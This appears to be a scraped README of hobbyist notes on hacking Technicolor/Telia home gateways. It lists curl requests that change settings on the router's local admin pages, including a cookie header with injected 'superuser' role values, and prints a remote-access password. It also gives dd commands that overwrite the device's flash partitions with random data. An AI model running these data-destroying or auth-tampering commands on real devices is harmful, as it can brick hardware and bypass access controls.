    
-H 'User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0)' 
    
-H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' 
    
-H 'Origin: http://192.168.1.3' 
    
-H 'Referer: http://192.168.1.3/gateway.lp' 
    
-H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' 
    
-H 'Cookie: YPF8827340282Jdskjhfiw_928937459182JAX666=185.213.154.234; sessionID=85a4f11d0eeae627f417a9815d0735716738c75e956c68ae19e4d64c46ce216d; undefined=undefined; superuser=undefined; role=superuser=undefined' 
    
--data-raw 'localdevIP=192.168.168.1&localdevmask=255.255.255.0&dhcpv6=disabled&dhcpv4State=disabled&dhcpStart=64&dhcpLimit=180&leaseTime=1h&action=SAVE&fromModal=YES&CSRFtoken=681d0f3680a6867f379468b7861460f3d5ef0e947805d0112c756bac7f2f787c' 
    
--compressed 
    
--insecure
    

    • 





## Devices

```sh
  curl 'http://192.168.1.1/modals/device-modal.lp' \
  -H 'Connection: keep-alive' \
  -H 'Accept: text/html, */*; q=0.01' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0)' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'Origin: http://192.168.1.1' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=c3795762f8b5e8dbe105e19456c0ff145679aedbcbda28090a15d1d095be03e2' \
  --data-raw 'priority=1&tableid=devices&stateid=&action=TABLE-MODIFY&index=1&CSRFtoken=13473a7d6cad23b9cf7aa5694ca942a0338583275f08ca6f343cac58a1352800' \
  --compressed \
  --insecure



Telephone


  curl 'http://192.168.1.1/modals/mmpbx-global-modal.lp' \
  -H 'Connection: keep-alive' \
  -H 'Accept: text/html, */*; q=0.01' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0)' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'Origin: http://192.168.1.1' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=c3795762f8b5e8dbe105e19456c0ff145679aedbcbda28090a15d1d095be03e2' \
  --data-raw 'mmpbx_enabled=0&action=SAVE&fromModal=YES&CSRFtoken=13473a7d6cad23b9cf7aa5694ca942a0338583275f08ca6f343cac58a1352800' \
  --compressed \
  --insecure


    

  • Pairing Headset
    • 



curl 'http://192.168.1.1/modals/mmpbx-dect-modal.lp' \
  -H 'Connection: keep-alive' \
  -H 'Accept: application/json, text/javascript, */*; q=0.01' \/gateway.lp?auto_update=true&getSessionStatus=true
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0)' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'Origin: http://192.168.1.1' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=c3795762f8b5e8dbe105e19456c0ff145679aedbcbda28090a15d1d095be03e2' \
  --data-raw 'action=pairing_handset&CSRFtoken=13473a7d6cad23b9cf7aa5694ca942a0338583275f08ca6f343cac58a1352800' \
  --compressed \
  --insecure


    

  • List contacts
    • 



curl 'http://192.168.1.1/modals/mmpbx-contacts-modal.lp' \
  -H 'Connection: keep-alive' \
  -H 'Accept: text/html, */*; q=0.01' \
  -H 'User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0)' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=c3795762f8b5e8dbe105e19456c0ff145679aedbcbda28090a15d1d095be03e2' \
  --compressed \
  --insecure


    

  • Call Log
    • 



  curl 'http://192.168.1.1/modals/mmpbx-log-modal.lp' \
  -H 'Connection: keep-alive' \
  -H 'Accept: text/html, */*; q=0.01' \
  -H 'User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0)' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=c3795762f8b5e8dbe105e19456c0ff145679aedbcbda28090a15d1d095be03e2' \
  --compressed \
  --insecure


    

  • Clear all call logs
    • 



  curl 'http://192.168.1.1/modals/mmpbx-log-modal.lp' \
  -H 'Connection: keep-alive' \
  -H 'Accept: text/html, */*; q=0.01' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0)' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'Origin: http://192.168.1.1' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=c3795762f8b5e8dbe105e19456c0ff145679aedbcbda28090a15d1d095be03e2' \
  --data-raw 'action=SAVE&operation=RESET&CSRFtoken=13473a7d6cad23b9cf7aa5694ca942a0338583275f08ca6f343cac58a1352800' \
  --compressed \
  --insecure


Assistance Disable


    

  • Set assistance off
    • 



curl 'http://192.168.1.1/modals/assistance-modal.lp' \
  -H 'Connection: keep-alive' \
  -H 'Accept: text/html, */*; q=0.01' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0)' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'Origin: http://192.168.1.1' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=c3795762f8b5e8dbe105e19456c0ff145679aedbcbda28090a15d1d095be03e2' \
  --data-raw 'ra_enabled=0&action=SAVE&fromModal=YES&CSRFtoken=13473a7d6cad23b9cf7aa5694ca942a0338583275f08ca6f343cac58a1352800' \
  --compressed \
  --insecure


Bridge / DMZ


    

  • Set (MOdal is named: 'bridge' in VBNT-7 and DMZ in older boards) enable:
    • 



curl 'http://192.168.1.3/modals/dmz-modal.lp' \
  -H 'Connection: keep-alive' \
  -H 'Accept: application/json, text/javascript, */*; q=0.01' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0)' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'Origin: http://192.168.1.3' \
  -H 'Referer: http://192.168.1.3/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=bb647ad9f1eff0e465f392973c7d9b32b7facea8634952251b5b3e447ff1aab0' \
  --data-raw 'DMZ_enabled=0&DMZ_flag=1&action=SAVE&fromModal=YES&CSRFtoken=34019b4b0bc60bdac7275e1a3b4a980f33343395b498472bb3b4af076e3d915b' \
  --compressed \
  --insecure


Minitrr064d


    

  • Create user:
    • 



computeHA1 -u <username> -p <password> -r
Self test passed - HA1 computation reliable
Self test passed - authentication check reliable

Computing hash for <username>:minitr064d:<password>


Various clash commands:


root>get InternetGatewayDevice.Services.X_000E50_RemoteAccess.
InternetGatewayDevice.Services.X_000E50_RemoteAccess.1.IPIntf [string] = InternetGatewayDevice.WANDevice.2.WANConnectionDevice.1.WANIPConnection.4
InternetGatewayDevice.Services.X_000E50_RemoteAccess.1.User [string] = assist
InternetGatewayDevice.Services.X_000E50_RemoteAccess.1.Port [unsignedInt] = 60443
InternetGatewayDevice.Services.X_000E50_RemoteAccess.1.RandomPassword [boolean] = 1
InternetGatewayDevice.Services.X_000E50_RemoteAccess.1.Password [string] = bWi9k7KUF$
InternetGatewayDevice.Services.X_000E50_RemoteAccess.1.Secure [boolean] = 1
InternetGatewayDevice.Services.X_000E50_RemoteAccess.1.Name [string] = remote
InternetGatewayDevice.Services.X_000E50_RemoteAccess.1.Status [string] = Active
InternetGatewayDevice.Services.X_000E50_RemoteAccess.1.Start [boolean] = 1
InternetGatewayDevice.Services.X_000E50_RemoteAccess.1.Mode [string] = Permanent
InternetGatewayDevice.Services.X_000E50_RemoteAccess.1.RandomPort [boolean] = 0
InternetGatewayDevice.Services.X_000E50_RemoteAccess.1.URL [string] = https://10.149.37.203:60443


    

  • dmdump, the xml file will contain over 13k lines:
    • 



dmdump 
loaded 325 objecttypes from /usr/share/transformer/mappings/igd/ and /usr/share/transformer/mappings/bbf/
could not add NumberOfEntries parameters for:
  Device.Routing.Router.{i}.: IPv4ForwardingNumberOfEntries
  Device.DHCPv4.Client.{i}.: SentOptionNumberOfEntries
  Device.Users.: UserNumberOfEntries
  Device.X_Management.: UserNumberOfEntries
  Device.WiFi.NeighboringWiFiDiagnostic.: ResultNumberOfEntries
  InternetGatewayDevice.X_Management.: UserNumberOfEntries
  #ROOT.: LANWLANConfigurationNumberOfEntries
  Device.DHCPv4.Server.Pool.{i}.: OptionNumberOfEntries
datamodel written to /tmp/datamodel.xml


    

  • There is alot of data in: datamode.xml file from dmdump command:
    • 



cat /tmp/datamodel.xml |wc -l
13031


XDSLCtl


xdslctl info --cfg
xdslctl info --state
xdslctl info --stats
xdslctl info --SNR
xdslctl info --QLN
xdslctl info --Hlog
xdslctl info --Hlin
xdslctl info --HlinS
xdslctl info --pbParams
xdslctl info --vendor


    

  • Example output from xdslctl:
    • 



root>xdslctl profile --show

Modulations:
        G.Dmt   Enabled
        G.lite  Enabled
        T1.413  Enabled
        ADSL2   Enabled
        AnnexL  Enabled
        ADSL2+  Enabled
        AnnexM  Enabled
        VDSL2   Enabled
VDSL2 profiles:
        8a      Enabled
        8b      Enabled
        8c      Enabled
        8d      Enabled
        12a     Enabled
        12b     Enabled
        17a     Enabled
        30a     Disabled
        US0     Enabled
Phone line pair:
        Inner pair
Capability:
        bitswap         On
        sra             On
        trellis         On
        sesdrop         On
        CoMinMgn        On
        24k             On
        phyReXmt(Us/Ds) Off/On
        Ginp(Us/Ds)     On/On
        TpsTc           AvPvAa
        monitorTone:    On
        dynamicD:       On
        dynamicF:       Off
        SOS:            On
        Training Margin(Q4 in dB):      -1(DEFAULT)


wuseman stuff


	,- W-A-R-N-I-N-G------------------------------------------------------,
	|                                                                     |
	|   - ALL STUFF BELOW MAY BE DANGEROUS AND IT MAY BRICK YOUR DEVICE   |
	|   - IT IS YOU DEVICE and YOU HAVE BEEN WARNED                       |
	|   - I TRYING EVERYTHING THATI S POSSIBLETO HACK ANY DEVICE SO       |
	|   - YOU RUNNING ALL SUTFF BELOW ON YOUR OWN RISKS WITHOUT WARNINGS  |
	|                                                                     |
        '---------------------------------------------------------------E-N-D-'


    

  • 

    When it's time to send your device back when Telia sending you a new one:
    

    • 

  • 

    THIS IS FOR VBNT-H only
    

    • 



dd if=/dev/urandom of=/dev/mtd1 ## (rootfs      - firmware) 
dd if=/dev/urandom of=/dev/mtd2 ## (rootfs_data - settings)
dd if=/dev/urandom of=/dev/mtd3 ## (bank_1      - bankversion)
dd if=/dev/urandom of=/dev/mtd4 ## (bank_2      - bankversion)


    

  • In a one-liner:
    • 



for mtd in mtd1 mtd2 mtd3 mtd4; do dd if=/dev/urandom of=/dev/${mtd}; done


Some other urls for TG799 hacking, you all rock \m/ -_- \m/


https://weaponizedautism.wordpress.com/2017/07/14/vulnerabilities-in-technicolor-adsl-residential-gateways/
https://hack-technicolor.readthedocs.io/
https://forums.whirlpool.net.au/archive/2650998
https://www.crc.id.au/hacking-the-technicolor-tg799vac-and-unlocking-features/
https://full-disclosure.eu/reports/2019/FDEU-CVE-2019-10222-telia-savitarna-backdoor.html



CONTACT


If you have problems, questions, ideas or suggestions please contact
us by posting to [email protected]



WEB SITE


https://wuseman.nr1.nu

https://nr1.nu 



END!



        
Note that the project description data, including the texts, logos, images, and/or trademarks, 
for each open source project belongs to its rightful owner. 
If you wish to add or remove any projects, please contact us at [email protected].